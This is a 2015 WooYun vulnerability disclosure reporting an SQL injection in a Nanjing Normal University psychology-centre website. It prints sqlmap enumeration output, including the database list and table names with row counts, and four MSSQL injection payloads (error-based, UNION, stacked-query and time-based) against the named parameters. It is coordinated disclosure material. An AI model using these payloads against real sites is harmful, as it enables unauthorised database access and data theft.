当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136135

漏洞标题:南京师范大学某站存在一处SQL注入漏洞

相关厂商:CCERT教育网应急响应组

漏洞作者: Hex

提交时间:2015-08-23 20:12

修复时间:2015-10-08 08:24

公开时间:2015-10-08 08:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

南京师范大学某站存在一处SQL注入漏洞

详细说明:

1# 漏洞存在于心理学实验教学中心网站中

http://**.**.**.**/xinli/TeaShow.aspx?TypeNo=47&teaNo=7


其中的TypeNo和teaNo参数均存在注入

error.png


2# 47个库

current user:    'xinli'
current database:    'NSXinLiXue'
current user is DBA:    False
available databases [47]:
[*] BZBB_lw
[*] ChuangXinNS
[*] db_dike
[*] db_dndqjzw
[*] db_njsdjw
[*] db_njsfsy
[*] db_nsddlhj
[*] db_nsdhgxn
[*] db_nsdmba
[*] db_nsdMediaC
[*] db_nsdscw
[*] db_nsdsw
[*] db_nsdswyy
[*] db_nsdswzy
[*] db_nyspjc
[*] db_sdjxjy
[*] db_spaqjc
[*] JiaoCai
[*] master
[*] MBA
[*] model
[*] msdb
[*] njnulab
[*] njnupj
[*] nju
[*] nju2222
[*] njuold
[*] njupj2012
[*] Northwind
[*] NSD_ApplicationChemical
[*] NSD_Cnooc
[*] NSD_ElectricalEngineering
[*] NSD_ElectronicInformation
[*] NSD_TeacherSkills
[*] NSD_TeachingTeam
[*] nsddky_sy
[*] nsdsfjdzx
[*] nsdsfjdzxnew
[*] nsglxt
[*] NSHuaKe
[*] NSXinLiXue
[*] NY_JG
[*] pubs
[*] ShangXueYuannew
[*] tempdb
[*] zhongxin
[*] zhongxinold


3# zhongxin库中的表

Database: zhongxin
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.tongji              | 1853    |
| dbo.dike_sqb            | 1480    |
| dbo.chuanmei_News       | 869     |
| dbo.news                | 404     |
| dbo.faxue_News          | 279     |
| dbo.meishu_News         | 169     |
| dbo.dianqi_News         | 135     |
| dbo.sw_News             | 101     |
| dbo.jinnv_News          | 95      |
| dbo.sw_links            | 88      |
| dbo.dianqi_szdw         | 82      |
| dbo.chuanmei_SmallClass | 71      |
| dbo.classurl            | 69      |
| dbo.xinli_News          | 69      |
| dbo.dike_szdw           | 60      |
| dbo.dike_News           | 55      |
| dbo.jiaoyu_News         | 48      |
| dbo.meishu_SmallClass   | 44      |
| dbo.faxue_down          | 43      |
| dbo.huaxue_News         | 43      |
| dbo.huaxue_SmallClass   | 43      |
| dbo.meishu_szdw         | 33      |
| dbo.dike_SmallClass     | 30      |
| dbo.sw_down             | 21      |
| dbo.meishu_sqb          | 20      |
| dbo.dike_szdwzdy        | 19      |
| dbo.dianqi_down         | 18      |
| dbo.meishu_down         | 18      |
| dbo.dike_down           | 17      |
| dbo.faxue_SmallClass    | 16      |
| dbo.huaxue_szdw         | 15      |
| dbo.jinnv_down          | 15      |
| dbo.xinli_down          | 15      |
| dbo.chuanmei_BigClass   | 13      |
| dbo.dike_BigClass       | 13      |
| dbo.faxue_szdw          | 13      |
| dbo.huaxue_BigClass     | 13      |
| dbo.sw_SmallClass       | 13      |
| dbo.sysconstraints      | 13      |
| dbo.faxue_BigClass      | 12      |
| dbo.jinnv_szdw          | 12      |
| dbo.sw_szdw             | 12      |
| dbo.faxue_sqb           | 11      |
| dbo.chaunmei_sqb        | 10      |
| dbo.chuanmei_down       | 10      |
| dbo.dianqi_BigClass     | 10      |
| dbo.dianqi_sqb          | 10      |
| dbo.jiaoyu_down         | 10      |
| dbo.jiaoyu_SmallClass   | 10      |
| dbo.jinnv_sqb           | 10      |
| dbo.sw_sqb              | 10      |
| dbo.xinli_BigClass      | 10      |
| dbo.xinli_sqb           | 10      |
| dbo.chuanmei_links      | 9       |
| dbo.jiaoyu_BigClass     | 9       |
| dbo.jinnv_BigClass      | 9       |
| dbo.jinnv_SmallClass    | 9       |
| dbo.meishu_BigClass     | 9       |
| dbo.sw_BigClass         | 9       |
| dbo.xinli_SmallClass    | 9       |
| dbo.jinnv_links         | 8       |
| dbo.dianqi_SmallClass   | 6       |
| dbo.link                | 6       |
| dbo.Admin               | 5       |
| dbo.huaxue_down         | 5       |
| dbo.dianqi_links        | 4       |
| dbo.dike_gg             | 4       |
| dbo.meishu_gg           | 4       |
| dbo.sw_gg               | 4       |
| dbo.chuanmei_szdw       | 3       |
| dbo.syssegments         | 3       |
| dbo.xinli_Vote          | 3       |
| dbo.chuanmei_gg         | 2       |
| dbo.dianqi_gg           | 2       |
| dbo.faxue_links         | 2       |
| dbo.jiaoyu_gg           | 2       |
| dbo.jinnv_gg            | 2       |
| dbo.xinli_gg            | 2       |
| dbo.faxue_gg            | 1       |
| dbo.jiaoyu_szdw         | 1       |
| dbo.xinli_links         | 1       |
| dbo.xinli_szdw          | 1       |
+-------------------------+---------+


4# 库太多了,就不一一看了

漏洞证明:

Place: GET
Parameter: TypeNo
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TypeNo=47' AND 6611=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6611=6611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58))) AND 'Kchf'='Kchf&teaNo=7
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: TypeNo=47' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+CHAR(98)+CHAR(82)+CHAR(73)+CHAR(99)+CHAR(102)+CHAR(88)+CHAR(117)+CHAR(86)+CHAR(104)+CHAR(87)+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58)-- &teaNo=7
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TypeNo=47'; WAITFOR DELAY '0:0:5'--&teaNo=7
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TypeNo=47' WAITFOR DELAY '0:0:5'--&teaNo=7

修复方案:

别处应该也存在注入点,建议全站检查下

版权声明:转载请注明来源 Hex@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-08-24 08:22

厂商回复:

通知用户处理中

最新状态:

暂无